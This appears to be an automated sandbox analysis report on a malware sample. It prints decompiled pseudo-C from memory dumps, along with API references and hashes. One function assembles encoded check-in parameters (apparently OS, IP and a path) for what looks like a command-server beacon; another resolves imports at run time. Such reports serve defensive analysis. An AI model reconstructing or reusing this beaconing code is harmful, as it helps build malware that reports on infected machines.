                                                                                                                                                                                                                        0x026faef5
                                                                                                                                                                                                                        0x026faef7
                                                                                                                                                                                                                        0x026faefa
                                                                                                                                                                                                                        0x026faefb
                                                                                                                                                                                                                        0x026faefd
                                                                                                                                                                                                                        0x026faefe
                                                                                                                                                                                                                        0x026faeff
                                                                                                                                                                                                                        0x026faf02
                                                                                                                                                                                                                        0x026faf0c
                                                                                                                                                                                                                        0x026fafbd
                                                                                                                                                                                                                        0x026fafc4
                                                                                                                                                                                                                        0x026fafcd
                                                                                                                                                                                                                        0x026faf12
                                                                                                                                                                                                                        0x026faf12
                                                                                                                                                                                                                        0x026faf18
                                                                                                                                                                                                                        0x026faf1e
                                                                                                                                                                                                                        0x026faf21
                                                                                                                                                                                                                        0x026faf24
                                                                                                                                                                                                                        0x026faf28
                                                                                                                                                                                                                        0x026faf2d
                                                                                                                                                                                                                        0x026faf32
                                                                                                                                                                                                                        0x026fafb2
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026faf34
                                                                                                                                                                                                                        0x026faf34
                                                                                                                                                                                                                        0x026faf40
                                                                                                                                                                                                                        0x026faf42
                                                                                                                                                                                                                        0x026faf9d
                                                                                                                                                                                                                        0x026faf9d
                                                                                                                                                                                                                        0x026fafa3
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026faf44
                                                                                                                                                                                                                        0x026faf53
                                                                                                                                                                                                                        0x026faf55
                                                                                                                                                                                                                        0x026faf56
                                                                                                                                                                                                                        0x026faf57
                                                                                                                                                                                                                        0x026faf5a
                                                                                                                                                                                                                        0x026faf5a
                                                                                                                                                                                                                        0x026faf5c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026faf5e
                                                                                                                                                                                                                        0x026faf5e
                                                                                                                                                                                                                        0x026fafa8
                                                                                                                                                                                                                        0x026faf60
                                                                                                                                                                                                                        0x026faf60
                                                                                                                                                                                                                        0x026faf64
                                                                                                                                                                                                                        0x026faf6c
                                                                                                                                                                                                                        0x026faf71
                                                                                                                                                                                                                        0x026faf76
                                                                                                                                                                                                                        0x026faf82
                                                                                                                                                                                                                        0x026faf8a
                                                                                                                                                                                                                        0x026faf91
                                                                                                                                                                                                                        0x026faf97
                                                                                                                                                                                                                        0x026faf9b
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026faf9b
                                                                                                                                                                                                                        0x026faf5e
                                                                                                                                                                                                                        0x026faf5c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026faf42
                                                                                                                                                                                                                        0x026fafb6
                                                                                                                                                                                                                        0x026fafb6
                                                                                                                                                                                                                        0x026fafb6
                                                                                                                                                                                                                        0x026faf32
                                                                                                                                                                                                                        0x026fafd2
                                                                                                                                                                                                                        0x026fafd9

                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                        • Instruction ID: 89f87e1484f8eb449688e83b004dc5360cc50c1718f1d62287b9dbcc389f6c2b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5821A7739012049FCF54DFA8C8809A7B7A5BF48350B068158DA5A9B245D730F915CBE0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 59%
                                                                                                                                                                                                                        			E026F87B0(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                                                                        				intOrPtr _v4;
                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                        				void* _v48;
                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                        				long _t22;
                                                                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                                                                        				intOrPtr _t24;
                                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                                        				intOrPtr _t37;
                                                                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                                        				intOrPtr* _t51;
                                                                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                                        				intOrPtr _t65;
                                                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                                                        				intOrPtr _t71;
                                                                                                                                                                                                                        				int _t74;
                                                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                                        				intOrPtr _t81;
                                                                                                                                                                                                                        				long _t83;
                                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                                        				intOrPtr* _t85;
                                                                                                                                                                                                                        				int _t86;
                                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                                                        				void* _t93;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t80 = __edx;
                                                                                                                                                                                                                        				_t22 = __eax;
                                                                                                                                                                                                                        				_t90 = _a16;
                                                                                                                                                                                                                        				_v4 = 8;
                                                                                                                                                                                                                        				if(__eax == 0) {
                                                                                                                                                                                                                        					_t22 = GetTickCount();
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t23 =  *0x26fd018; // 0xf682eb31
                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                        				_t24 =  *0x26fd014; // 0x3a87c8cd
                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                        				_t25 =  *0x26fd010; // 0xd8d2f808
                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                        				_t26 =  *0x26fd00c; // 0x81762942
                                                                                                                                                                                                                        				asm("bswap eax");
                                                                                                                                                                                                                        				_t27 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t3 = _t27 + 0x26fe633; // 0x74666f73
                                                                                                                                                                                                                        				_t86 = wsprintfA(_t90, _t3, 2, 0x3d132, _t26, _t25, _t24, _t23,  *0x26fd02c,  *0x26fd004, _t22);
                                                                                                                                                                                                                        				_t30 = E026F8616();
                                                                                                                                                                                                                        				_t31 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t4 = _t31 + 0x26fe673; // 0x74707526
                                                                                                                                                                                                                        				_t34 = wsprintfA(_t86 + _t90, _t4, _t30);
                                                                                                                                                                                                                        				_t81 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        				_t87 = _t86 + _t34;
                                                                                                                                                                                                                        				_t93 = _t91 + 0x38;
                                                                                                                                                                                                                        				_a32 = E026F66DB(0x26fd00a, _t81 + 4);
                                                                                                                                                                                                                        				_t37 =  *0x26fd2cc; // 0x0
                                                                                                                                                                                                                        				_t83 = 0;
                                                                                                                                                                                                                        				if(_t37 != 0) {
                                                                                                                                                                                                                        					_t71 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        					_t7 = _t71 + 0x26fe8ad; // 0x3d736f26
                                                                                                                                                                                                                        					_t74 = wsprintfA(_t87 + _t90, _t7, _t37);
                                                                                                                                                                                                                        					_t93 = _t93 + 0xc;
                                                                                                                                                                                                                        					_t87 = _t87 + _t74;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t38 =  *0x26fd2c8; // 0x0
                                                                                                                                                                                                                        				if(_t38 != _t83) {
                                                                                                                                                                                                                        					_t68 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        					_t9 = _t68 + 0x26fe8a6; // 0x3d706926
                                                                                                                                                                                                                        					wsprintfA(_t87 + _t90, _t9, _t38);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(_a32 != _t83) {
                                                                                                                                                                                                                        					_t76 = RtlAllocateHeap( *0x26fd238, _t83, 0x800);
                                                                                                                                                                                                                        					if(_t76 != _t83) {
                                                                                                                                                                                                                        						E026F59B0(GetTickCount());
                                                                                                                                                                                                                        						_t45 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        						__imp__(_t45 + 0x40);
                                                                                                                                                                                                                        						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                        						_t49 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        						__imp__(_t49 + 0x40);
                                                                                                                                                                                                                        						_t51 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        						_t88 = E026F69CF(1, _t80, _t90,  *_t51);
                                                                                                                                                                                                                        						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                        						if(_t88 != _t83) {
                                                                                                                                                                                                                        							StrTrimA(_t88, 0x26fc294);
                                                                                                                                                                                                                        							_t57 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        							_push(_t88);
                                                                                                                                                                                                                        							_t11 = _t57 + 0x26fe252; // 0x616d692f
                                                                                                                                                                                                                        							_t59 = E026F5FD1(_t11);
                                                                                                                                                                                                                        							_v20 = _t59;
                                                                                                                                                                                                                        							if(_t59 != _t83) {
                                                                                                                                                                                                                        								_t84 = __imp__;
                                                                                                                                                                                                                        								 *_t84(_t88, _v4);
                                                                                                                                                                                                                        								 *_t84(_t76, _v0);
                                                                                                                                                                                                                        								_t85 = __imp__;
                                                                                                                                                                                                                        								 *_t85(_t76, _v32);
                                                                                                                                                                                                                        								 *_t85(_t76, _t88);
                                                                                                                                                                                                                        								_t65 = E026F515C(0xffffffffffffffff, _t76, _v32, _v28);
                                                                                                                                                                                                                        								_v56 = _t65;
                                                                                                                                                                                                                        								if(_t65 != 0 && _t65 != 0x10d2) {
                                                                                                                                                                                                                        									E026F5225();
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								HeapFree( *0x26fd238, 0, _v48);
                                                                                                                                                                                                                        								_t83 = 0;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							HeapFree( *0x26fd238, _t83, _t88);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						HeapFree( *0x26fd238, _t83, _t76);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, _t83, _a24);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				HeapFree( *0x26fd238, _t83, _t90);
                                                                                                                                                                                                                        				return _a12;
                                                                                                                                                                                                                        			}











































                                                                                                                                                                                                                        0x026f87b0
                                                                                                                                                                                                                        0x026f87b0
                                                                                                                                                                                                                        0x026f87b5
                                                                                                                                                                                                                        0x026f87bb
                                                                                                                                                                                                                        0x026f87c5
                                                                                                                                                                                                                        0x026f87c7
                                                                                                                                                                                                                        0x026f87c7
                                                                                                                                                                                                                        0x026f87d4
                                                                                                                                                                                                                        0x026f87df
                                                                                                                                                                                                                        0x026f87e2
                                                                                                                                                                                                                        0x026f87ed
                                                                                                                                                                                                                        0x026f87f0
                                                                                                                                                                                                                        0x026f87f5
                                                                                                                                                                                                                        0x026f87f8
                                                                                                                                                                                                                        0x026f87fd
                                                                                                                                                                                                                        0x026f8800
                                                                                                                                                                                                                        0x026f880c
                                                                                                                                                                                                                        0x026f8819
                                                                                                                                                                                                                        0x026f881b
                                                                                                                                                                                                                        0x026f8821
                                                                                                                                                                                                                        0x026f8826
                                                                                                                                                                                                                        0x026f8831
                                                                                                                                                                                                                        0x026f8833
                                                                                                                                                                                                                        0x026f8839
                                                                                                                                                                                                                        0x026f883b
                                                                                                                                                                                                                        0x026f884b
                                                                                                                                                                                                                        0x026f884f
                                                                                                                                                                                                                        0x026f8854
                                                                                                                                                                                                                        0x026f8858
                                                                                                                                                                                                                        0x026f885b
                                                                                                                                                                                                                        0x026f8860
                                                                                                                                                                                                                        0x026f886b
                                                                                                                                                                                                                        0x026f886d
                                                                                                                                                                                                                        0x026f8870
                                                                                                                                                                                                                        0x026f8870
                                                                                                                                                                                                                        0x026f8872
                                                                                                                                                                                                                        0x026f8879
                                                                                                                                                                                                                        0x026f887c
                                                                                                                                                                                                                        0x026f8881
                                                                                                                                                                                                                        0x026f888b
                                                                                                                                                                                                                        0x026f888d
                                                                                                                                                                                                                        0x026f8894
                                                                                                                                                                                                                        0x026f88ac
                                                                                                                                                                                                                        0x026f88b0
                                                                                                                                                                                                                        0x026f88bc
                                                                                                                                                                                                                        0x026f88c1
                                                                                                                                                                                                                        0x026f88ca
                                                                                                                                                                                                                        0x026f88db
                                                                                                                                                                                                                        0x026f88df
                                                                                                                                                                                                                        0x026f88e8
                                                                                                                                                                                                                        0x026f88ee
                                                                                                                                                                                                                        0x026f88fb
                                                                                                                                                                                                                        0x026f8908
                                                                                                                                                                                                                        0x026f890e
                                                                                                                                                                                                                        0x026f891a
                                                                                                                                                                                                                        0x026f8920
                                                                                                                                                                                                                        0x026f8925
                                                                                                                                                                                                                        0x026f8926
                                                                                                                                                                                                                        0x026f892d
                                                                                                                                                                                                                        0x026f8932
                                                                                                                                                                                                                        0x026f8938
                                                                                                                                                                                                                        0x026f893e
                                                                                                                                                                                                                        0x026f8945
                                                                                                                                                                                                                        0x026f894c
                                                                                                                                                                                                                        0x026f8952
                                                                                                                                                                                                                        0x026f8959
                                                                                                                                                                                                                        0x026f895d
                                                                                                                                                                                                                        0x026f8968
                                                                                                                                                                                                                        0x026f896d
                                                                                                                                                                                                                        0x026f8973
                                                                                                                                                                                                                        0x026f897c
                                                                                                                                                                                                                        0x026f897c
                                                                                                                                                                                                                        0x026f898d
                                                                                                                                                                                                                        0x026f8993
                                                                                                                                                                                                                        0x026f8993
                                                                                                                                                                                                                        0x026f899d
                                                                                                                                                                                                                        0x026f899d
                                                                                                                                                                                                                        0x026f89ab
                                                                                                                                                                                                                        0x026f89ab
                                                                                                                                                                                                                        0x026f89bc
                                                                                                                                                                                                                        0x026f89bc
                                                                                                                                                                                                                        0x026f89ca
                                                                                                                                                                                                                        0x026f89db

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 026F87C7
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 026F8814
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 026F8831
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 026F886B
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 026F888B
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 026F88A6
                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 026F88B6
                                                                                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(04B39570), ref: 026F88CA
                                                                                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(04B39570), ref: 026F88E8
                                                                                                                                                                                                                        • StrTrimA.SHLWAPI(00000000,026FC294,?,04B395B0), ref: 026F891A
                                                                                                                                                                                                                          • Part of subcall function 026F5FD1: lstrlen.KERNEL32(026F8932,00000000,00000000,026F8932,616D692F,00000000), ref: 026F5FDD
                                                                                                                                                                                                                          • Part of subcall function 026F5FD1: lstrlen.KERNEL32(?), ref: 026F5FE5
                                                                                                                                                                                                                          • Part of subcall function 026F5FD1: lstrcpy.KERNEL32(00000000,?), ref: 026F5FFC
                                                                                                                                                                                                                          • Part of subcall function 026F5FD1: lstrcat.KERNEL32(00000000,?), ref: 026F6007
                                                                                                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 026F8945
                                                                                                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 026F894C
                                                                                                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 026F8959
                                                                                                                                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 026F895D
                                                                                                                                                                                                                          • Part of subcall function 026F515C: WaitForSingleObject.KERNEL32(00000000,73BB81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 026F520E
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 026F898D
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 026F899D
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,04B395B0), ref: 026F89AB
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 026F89BC
                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 026F89CA
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$Free$wsprintf$lstrcatlstrcpy$CountCriticalSectionTicklstrlen$AllocateEnterLeaveObjectSingleTrimWait
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3800513375-0
                                                                                                                                                                                                                        • Opcode ID: f757bd7aeea4b44b407796e51e4cc15b08a25980aa5c4dca3e9a13402c35983e
                                                                                                                                                                                                                        • Instruction ID: 560915f9820b8ee441c48778e9eb9ed477cbd8356759280099e990f65f4873d6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f757bd7aeea4b44b407796e51e4cc15b08a25980aa5c4dca3e9a13402c35983e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A51C371980144AFCF91EF68EC88D4E7BE9EB48314B051915F709C7210D736E9A6CBA5
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                                        			E026FABB5(long _a4, long _a8) {
                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                        				LONG* _v28;
                                                                                                                                                                                                                        				long _v40;
                                                                                                                                                                                                                        				long _v44;
                                                                                                                                                                                                                        				long _v48;
                                                                                                                                                                                                                        				CHAR* _v52;
                                                                                                                                                                                                                        				long _v56;
                                                                                                                                                                                                                        				CHAR* _v60;
                                                                                                                                                                                                                        				long _v64;
                                                                                                                                                                                                                        				signed int* _v68;
                                                                                                                                                                                                                        				char _v72;
                                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                                                                        				intOrPtr* _t82;
                                                                                                                                                                                                                        				intOrPtr* _t83;
                                                                                                                                                                                                                        				intOrPtr* _t85;
                                                                                                                                                                                                                        				intOrPtr* _t90;
                                                                                                                                                                                                                        				intOrPtr* _t95;
                                                                                                                                                                                                                        				intOrPtr* _t98;
                                                                                                                                                                                                                        				void* _t102;
                                                                                                                                                                                                                        				intOrPtr* _t104;
                                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                                        				long _t116;
                                                                                                                                                                                                                        				void _t125;
                                                                                                                                                                                                                        				void* _t131;
                                                                                                                                                                                                                        				signed short _t133;
                                                                                                                                                                                                                        				struct HINSTANCE__* _t138;
                                                                                                                                                                                                                        				signed int* _t139;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t139 = _a4;
                                                                                                                                                                                                                        				_v28 = _t139[2] + 0x26f0000;
                                                                                                                                                                                                                        				_t115 = _t139[3] + 0x26f0000;
                                                                                                                                                                                                                        				_t131 = _t139[4] + 0x26f0000;
                                                                                                                                                                                                                        				_v8 = _t139[7];
                                                                                                                                                                                                                        				_v60 = _t139[1] + 0x26f0000;
                                                                                                                                                                                                                        				_v16 = _t139[5] + 0x26f0000;
                                                                                                                                                                                                                        				_v64 = _a8;
                                                                                                                                                                                                                        				_v72 = 0x24;
                                                                                                                                                                                                                        				_v68 = _t139;
                                                                                                                                                                                                                        				_v56 = 0;
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				_v48 = 0;
                                                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                                                        				if(( *_t139 & 0x00000001) == 0) {
                                                                                                                                                                                                                        					_a8 =  &_v72;
                                                                                                                                                                                                                        					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t138 =  *_v28;
                                                                                                                                                                                                                        				_t76 = _a8 - _t115 >> 2 << 2;
                                                                                                                                                                                                                        				_t133 =  *(_t131 + _t76);
                                                                                                                                                                                                                        				_a4 = _t76;
                                                                                                                                                                                                                        				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                                                                                                                                                                                        				_v56 = _t80;
                                                                                                                                                                                                                        				_t81 = _t133 + 0x26f0002;
                                                                                                                                                                                                                        				if(_t80 == 0) {
                                                                                                                                                                                                                        					_t81 = _t133 & 0x0000ffff;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_v52 = _t81;
                                                                                                                                                                                                                        				_t82 =  *0x26fd1a0; // 0x0
                                                                                                                                                                                                                        				_t116 = 0;
                                                                                                                                                                                                                        				if(_t82 == 0) {
                                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                                        					if(_t138 != 0) {
                                                                                                                                                                                                                        						L18:
                                                                                                                                                                                                                        						_t83 =  *0x26fd1a0; // 0x0
                                                                                                                                                                                                                        						_v48 = _t138;
                                                                                                                                                                                                                        						if(_t83 != 0) {
                                                                                                                                                                                                                        							_t116 =  *_t83(2,  &_v72);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						if(_t116 != 0) {
                                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                                        							 *_a8 = _t116;
                                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                                        							_t85 =  *0x26fd1a0; // 0x0
                                                                                                                                                                                                                        							if(_t85 != 0) {
                                                                                                                                                                                                                        								_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                                        								_v48 = _t138;
                                                                                                                                                                                                                        								_v44 = _t116;
                                                                                                                                                                                                                        								 *_t85(5,  &_v72);
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							return _t116;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                                        								_t116 = GetProcAddress(_t138, _v52);
                                                                                                                                                                                                                        								if(_t116 == 0) {
                                                                                                                                                                                                                        									_v40 = GetLastError();
                                                                                                                                                                                                                        									_t90 =  *0x26fd19c; // 0x0
                                                                                                                                                                                                                        									if(_t90 != 0) {
                                                                                                                                                                                                                        										_t116 =  *_t90(4,  &_v72);
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									if(_t116 == 0) {
                                                                                                                                                                                                                        										_a4 =  &_v72;
                                                                                                                                                                                                                        										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                                                                                                                                                                                        										_t116 = _v44;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                                                                                                                                                                                        								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                                                                                                                                                                                        									_t116 =  *(_a4 + _v16);
                                                                                                                                                                                                                        									if(_t116 != 0) {
                                                                                                                                                                                                                        										goto L32;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								goto L27;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t98 =  *0x26fd1a0; // 0x0
                                                                                                                                                                                                                        					if(_t98 == 0) {
                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                        						_t138 = LoadLibraryA(_v60);
                                                                                                                                                                                                                        						if(_t138 != 0) {
                                                                                                                                                                                                                        							L13:
                                                                                                                                                                                                                        							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                                                                                                                                                                                        								FreeLibrary(_t138);
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								if(_t139[6] != 0) {
                                                                                                                                                                                                                        									_t102 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                        									if(_t102 != 0) {
                                                                                                                                                                                                                        										 *(_t102 + 4) = _t139;
                                                                                                                                                                                                                        										_t125 =  *0x26fd198; // 0x0
                                                                                                                                                                                                                        										 *_t102 = _t125;
                                                                                                                                                                                                                        										 *0x26fd198 = _t102;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							goto L18;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_v40 = GetLastError();
                                                                                                                                                                                                                        						_t104 =  *0x26fd19c; // 0x0
                                                                                                                                                                                                                        						if(_t104 == 0) {
                                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                                        							_a8 =  &_v72;
                                                                                                                                                                                                                        							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                                                                                                                                                                                        							return _v44;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t138 =  *_t104(3,  &_v72);
                                                                                                                                                                                                                        						if(_t138 != 0) {
                                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t138 =  *_t98(1,  &_v72);
                                                                                                                                                                                                                        					if(_t138 != 0) {
                                                                                                                                                                                                                        						goto L13;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t116 =  *_t82(0,  &_v72);
                                                                                                                                                                                                                        				if(_t116 != 0) {
                                                                                                                                                                                                                        					goto L33;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				goto L6;
                                                                                                                                                                                                                        			}

































                                                                                                                                                                                                                        0x026fabc4
                                                                                                                                                                                                                        0x026fabda
                                                                                                                                                                                                                        0x026fabe0
                                                                                                                                                                                                                        0x026fabe2
                                                                                                                                                                                                                        0x026fabe7
                                                                                                                                                                                                                        0x026fabed
                                                                                                                                                                                                                        0x026fabf2
                                                                                                                                                                                                                        0x026fabf5
                                                                                                                                                                                                                        0x026fac03
                                                                                                                                                                                                                        0x026fac0a
                                                                                                                                                                                                                        0x026fac0d
                                                                                                                                                                                                                        0x026fac10
                                                                                                                                                                                                                        0x026fac11
                                                                                                                                                                                                                        0x026fac14
                                                                                                                                                                                                                        0x026fac17
                                                                                                                                                                                                                        0x026fac1a
                                                                                                                                                                                                                        0x026fac1f
                                                                                                                                                                                                                        0x026fac2e
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fac34
                                                                                                                                                                                                                        0x026fac3e
                                                                                                                                                                                                                        0x026fac48
                                                                                                                                                                                                                        0x026fac4d
                                                                                                                                                                                                                        0x026fac4f
                                                                                                                                                                                                                        0x026fac59
                                                                                                                                                                                                                        0x026fac5c
                                                                                                                                                                                                                        0x026fac5f
                                                                                                                                                                                                                        0x026fac65
                                                                                                                                                                                                                        0x026fac67
                                                                                                                                                                                                                        0x026fac67
                                                                                                                                                                                                                        0x026fac6a
                                                                                                                                                                                                                        0x026fac6d
                                                                                                                                                                                                                        0x026fac72
                                                                                                                                                                                                                        0x026fac76
                                                                                                                                                                                                                        0x026fac89
                                                                                                                                                                                                                        0x026fac8b
                                                                                                                                                                                                                        0x026fad33
                                                                                                                                                                                                                        0x026fad33
                                                                                                                                                                                                                        0x026fad3a
                                                                                                                                                                                                                        0x026fad3d
                                                                                                                                                                                                                        0x026fad47
                                                                                                                                                                                                                        0x026fad47
                                                                                                                                                                                                                        0x026fad4b
                                                                                                                                                                                                                        0x026fadc9
                                                                                                                                                                                                                        0x026fadcc
